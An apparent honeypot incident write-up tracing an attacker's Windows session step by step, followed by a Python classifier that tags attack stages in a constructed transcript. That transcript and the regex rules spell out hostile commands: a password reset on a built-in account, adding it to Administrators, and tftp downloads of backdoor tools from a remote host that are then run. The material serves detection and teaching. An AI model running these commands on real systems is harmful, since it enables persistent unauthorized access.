At around 3:57 PM, we noticed some strange activity picked up in our honeynet logs. After a bit of investigation, we found that an attacker was snooping around one of our honeypots.
In this version of our "advisory", I will show you a sample of the activity that we've picked up. Here is a step-by-step walkthrough of the start of the attack session:
Step 1: Our attacker begins his activities by opening a command shell.
Step 2: The attacker next issues the "ipconfig" command, an obvious starting point: it reveals the host's IP address, subnet mask and default gateway, which tells the attacker where the machine sits on the network.
Step 3: The attacker issues a net user command. The net user command creates, deletes and modifies user accounts on the computer. Here the attacker uses it to set a new password on the "TsInternetUser" account, a built-in account that Windows 2000 creates when Terminal Services is installed and that is rarely watched. The command succeeds, so the attacker now "owns" an account on the honeypot.
Step 4: The attacker issues another net user command, this time to disable the "guest" account (net user guest /active:no), presumably to close off the most obvious way for anyone else to walk in.
Step 5: The attacker issues a net localgroup command. The net localgroup command modifies local groups on the computer. In this case he adds "TsInternetUser" to the local Administrators group, and the command succeeds. The attacker now has an administrative account. One caveat worth noting: both the password reset in Step 3 and this group change require administrative rights to begin with, so the shell the attacker was typing into was already privileged. What these two steps really buy him is a persistent administrative login that survives the initial foothold, rather than a privilege escalation in the strict sense.
Step 6: The attacker uses tftp to download a file called mt.exe from a remote server. The transfer fails. Further research indicates that "mt.exe" is a backdoor tool. Because no sample was obtained, nothing can be said about what it would have done on disk.
Step 7: The attacker tries to run "mt.exe" with a "-findpass" parameter. I am not sure what this switch does. The name suggests it retrieves passwords; since the attacker already has administrator access on this host, the likely purpose is harvesting other users' credentials (logged-on accounts, stored passwords) for reuse elsewhere rather than for this machine. The command obviously fails, since the "mt.exe" download was unsuccessful.
Step 8: The attacker runs the same tool with the "-chkts" parameter, followed closely by "-setupts". Both fail for the same reason. I have yet to investigate this backdoor tool; the "ts" in the switch names suggests checking for and setting up Terminal Services, which would give the attacker a remote interactive logon with the administrative account he just took over, but that is an inference from the names only.
Steps 9 and 10: This time the attacker tries to download and run a file called "s_up_rar.exe". The download fails and I wasn't able to obtain a sample of it. A Google search didn't turn up anything either.
Step 11: It is strange that the attacker issued an "echo off" command followed by yet another attempt to run the "s_up_rar.exe" file that had failed to download, and then an "echo on" command. "echo off" and "echo on" are batch-file idioms that serve no purpose in an interactive session, so I am beginning to suspect that this may be an automated attempt, with the commands fed from a script.
Steps 12 and 13: The attacker tries to download and run a file called "acsmic.exe". Yet another failed attempt, so no sample was caught. A Google search did not turn up anything about the file.
Step 14: The attacker tries to create a file on the honeypot called "s.vbs". The actual code is in the packet capture. I have not yet analyzed it and have no plans to, but volunteers would be welcome.
Steps 15, 16 and 17: The attacker tries to run the "s.vbs" script through cscript, the console version of the Windows Script Host. Step 16 repeats Step 14 and Step 17 repeats Step 15; possibly the attacker made a mistake the first time and is creating and running the file again. Unfortunately, after this we lost the attacker, either by his own initiative or through a fault of our own.
As you've seen here, this is typical attacker behavior. It is important to highlight the order: attackers usually begin with a surface recon of the system, proceed to create or acquire an account, then raise that account's privileges, and only after that install a backdoor. Once the backdoor is installed, the attacker leaves with the satisfied thought that he or she has "owned" the computer. For anyone watching their own logs, every one of those stages left an indicator here: a password reset on a built-in account, the Guest account being disabled, an addition to the Administrators group, tftp.exe being invoked from a shell, and cscript running a freshly written .vbs file.
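That sequence can be turned into a simple session classifier. The following Python is an added example, not part of the original advisory or of the honeynet's own tooling: it runs over a constructed transcript modelled on the steps above (the tftp server address 10.0.0.5, the password value and the echo-redirection used to write s.vbs are assumptions, since the original capture is not reproduced on this page), tags each command with the attack stage it belongs to, tracks which downloaded binaries are later executed, and checks whether the recon, account takeover, privilege escalation and tool download stages occurred in that order.

```python
import re

# Constructed honeypot transcript modelled on the session described above.
# It is not the original capture: the tftp server address, the password
# value and the echo-redirection used to write s.vbs are assumptions.
SAMPLE_SESSION = """\
ipconfig
net user TsInternetUser P@ssw0rd
net user guest /active:no
net localgroup administrators TsInternetUser /add
tftp -i 10.0.0.5 GET mt.exe
mt.exe -findpass
mt.exe -chkts
mt.exe -setupts
tftp -i 10.0.0.5 GET s_up_rar.exe
s_up_rar.exe
echo off
s_up_rar.exe
echo on
tftp -i 10.0.0.5 GET acsmic.exe
acsmic.exe
echo Set sh = CreateObject("WScript.Shell") > s.vbs
cscript s.vbs
"""

# Stage rules, tried in order; the first match wins. Most patterns are anchored
# with ^; script_drop looks anywhere in the line for a redirect into a .vbs file.
RULES = [
    ("recon",                re.compile(r"^(ipconfig|systeminfo|whoami|netstat)\b|^net\s+(user|localgroup)\s*$", re.I)),
    ("account_disable",      re.compile(r"^net\s+user\s+\S+\s+/active:no\b", re.I)),
    ("password_change",      re.compile(r"^net\s+user\s+\S+\s+(?!/)\S+\s*$", re.I)),
    ("privilege_escalation", re.compile(r"^net\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("tool_download",        re.compile(r"^tftp\b.*\bget\s+(\S+)", re.I)),
    ("script_drop",          re.compile(r">\s*(\S+\.vbs)\s*$", re.I)),
    ("script_execution",     re.compile(r"^[cw]script\b", re.I)),
]

# The order of stages that makes up the "typical" chain described above.
KILL_CHAIN = ["recon", "password_change", "privilege_escalation", "tool_download"]


def classify(command, downloaded):
    """Return the stage label for one shell command, or None if nothing matched.

    `downloaded` is the set of file names fetched earlier in the same session.
    It is updated on every download and consulted afterwards, so running a
    fetched binary is labelled tool_execution even though the name itself
    (mt.exe, s_up_rar.exe, acsmic.exe) is not on any blocklist.
    """
    cmd = command.strip()
    if not cmd:
        return None
    for stage, rule in RULES:
        match = rule.search(cmd)
        if match:
            if stage == "tool_download":
                downloaded.add(match.group(1).lower())
            return stage
    if cmd.split()[0].lower() in downloaded:
        return "tool_execution"
    return None


def analyze_session(text):
    """Tag every command in a transcript; returns a list of (stage, command)."""
    downloaded = set()
    events = []
    for line in text.splitlines():
        stage = classify(line, downloaded)
        if stage is not None:
            events.append((stage, line.strip()))
    return events


def kill_chain_observed(events):
    """True when the KILL_CHAIN stages occur in that order; other events may interleave."""
    remaining = list(KILL_CHAIN)
    for stage, _ in events:
        if remaining and stage == remaining[0]:
            remaining.pop(0)
    return not remaining


if __name__ == "__main__":
    evs = analyze_session(SAMPLE_SESSION)
    for stage, cmd in evs:
        print(f"{stage:22} {cmd}")
    print("kill chain observed:", kill_chain_observed(evs))
```

The "echo off" and "echo on" lines are deliberately left unclassified; they carry no stage of their own, though a session that contains them is worth a second look as a sign of scripted input. Matching executed binaries against the session's own download list, rather than a fixed name list, is what lets the classifier label unfamiliar tools such as "acsmic.exe" without knowing anything about them.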